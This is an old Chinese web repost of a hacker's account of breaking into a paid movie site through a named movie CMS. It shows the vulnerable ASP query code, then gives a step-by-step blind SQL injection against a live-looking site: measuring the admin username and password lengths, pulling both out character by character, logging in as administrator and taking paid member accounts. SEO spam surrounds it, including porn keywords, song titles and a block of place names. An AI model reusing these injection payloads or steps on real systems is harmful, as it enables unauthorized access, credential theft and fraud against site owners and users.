成人午夜激情影院,小视频免费在线观看,国产精品夜夜嗨,欧美日韩精品一区二区在线播放

當前位置:首頁>>軟件教程>>病毒安全>>新聞內容
簡單入侵收費電影網站
作者:佚名 發布時間:2004-6-9 21:53:45 文章來源:西部E網
  近日學習sql injection,下載金梅收費電影程序2003會員版看了一通, 發現movie.asp這個文件有問題:
   dim sql

   dim rs

   articleid=request("id")

   set rs=server.createobject("adodb.recordset")

   sql="update learning set hits=hits+1 where articleID="&articleid

   rs.open sql,conn,1,3

   sql="select * from learning where articleid="&articleid

   rs.open sql,conn,1,1

   title=rs("title")

   ittype=rs("typeid")

  沒有對變量做任何檢查,那就別怪我了,呵呵,找了個目標網站,

  我們開始測試管理員帳號的位數,因為保存管理員帳號的字段名為name,所以語句為:

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>4)

  正常返回頁面,由此我們可以知道管理員的帳號是大于4位的!

  我們繼續,

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>

  "無法顯示網頁",出錯了,由此我們可以知道管理員的帳號是大于等于8位的

  我們再來,

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=8)

  正常返回頁面,好極了,由此得出

  name為8位

  同樣

  http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)

  正常返回頁面

  pwd為21位,TNND的,這么長!

  不管了,我們接下來開始測試管理員的用戶名

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>50)

  正常返回頁面,看來還不夠大.

  注:mid函數可以把密碼分成若干部分取出,使用方法 mid(字符串,起始位,取出的字符串的長度)

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>100)

  "無法顯示頁面",看來比100還小.

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)

  正常返回頁面,于是我們可以得到管理員的用戶名第一位的asc碼為:100

  通過查詢asc碼表可以得到,

  name的第一位為:d

  接下來順利的得到了name=darkeyes^

  然后我們開始測試pwd,呼,有21位啊,真是路漫漫其修遠啊!:)

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>100)

  正常顯示頁面,再來

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>110)

  "無法顯示頁面",比110小哦,呵呵

  http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)

  正常顯示頁面,對了,得到

  pwd的第一位為:f

  最后順利的得到了

  pwd=xyfsdb7ew8y654231123d

  找到管理頁面,登錄進去,拿了幾個黃金會員的帳號,就去慢慢欣賞movies了,呵呵。
最新更新
·getPlusPlus_Adobe.exe是什么
·刪除v6677.cn網站修改瀏覽器
·十大Windows7適用的殺毒軟件
·如何去掉ESET NOD32在郵件中
·免費獲得諾頓NIS 2010注冊碼
·Cnups.dll是什么文件,怎樣刪
·au_.exe文件時病毒嗎?怎么樣
·卡巴斯基自動更新到100%不動
·自己動手打造U盤版殺毒軟件
·讓你永久免費使用卡巴斯基的
相關信息
畫心
愚愛
偏愛
火苗
白狐
畫沙
犯錯
歌曲
傳奇
稻香
小酒窩
獅子座
小情歌
全是愛
棉花糖
海豚音
我相信
甩蔥歌
這叫愛
shero
走天涯
琉璃月
Nobody
我愛他
套馬桿
愛是你我
最后一次
少女時代
灰色頭像
斷橋殘雪
美了美了
狼的誘惑
我很快樂
星月神話
心痛2009
愛丫愛丫
半城煙沙
旗開得勝
郎的誘惑
愛情買賣
2010等你來
我叫小沈陽
i miss you
姑娘我愛你
我們都一樣
其實很寂寞
我愛雨夜花
變心的玫瑰
犀利哥之歌
你是我的眼
你是我的OK繃
貝多芬的悲傷
哥只是個傳說
丟了幸福的豬
找個人來愛我
要嫁就嫁灰太狼
如果這就是愛情
我們沒有在一起
寂寞在唱什么歌
斯琴高麗的傷心
別在我離開之前離開
不是因為寂寞才想你
愛上你等于愛上了錯
在心里從此永遠有個你
一個人的寂寞兩個人的錯
主站蜘蛛池模板: 阳东县| 都兰县| 石台县| 西充县| 高阳县| 松溪县| 花莲市| 木兰县| 依兰县| 龙州县| 筠连县| 陈巴尔虎旗| 延寿县| 伊金霍洛旗| 青海省| 留坝县| 株洲市| 静安区| 慈溪市| 徐水县| 旬邑县| 婺源县| 古交市| 大埔区| 双流县| 金平| 东兰县| 车致| 大田县| 清镇市| 双城市| 孝感市| 镇远县| 措勤县| 静安区| 通海县| 松滋市| 合作市| 葫芦岛市| 德格县| 德化县|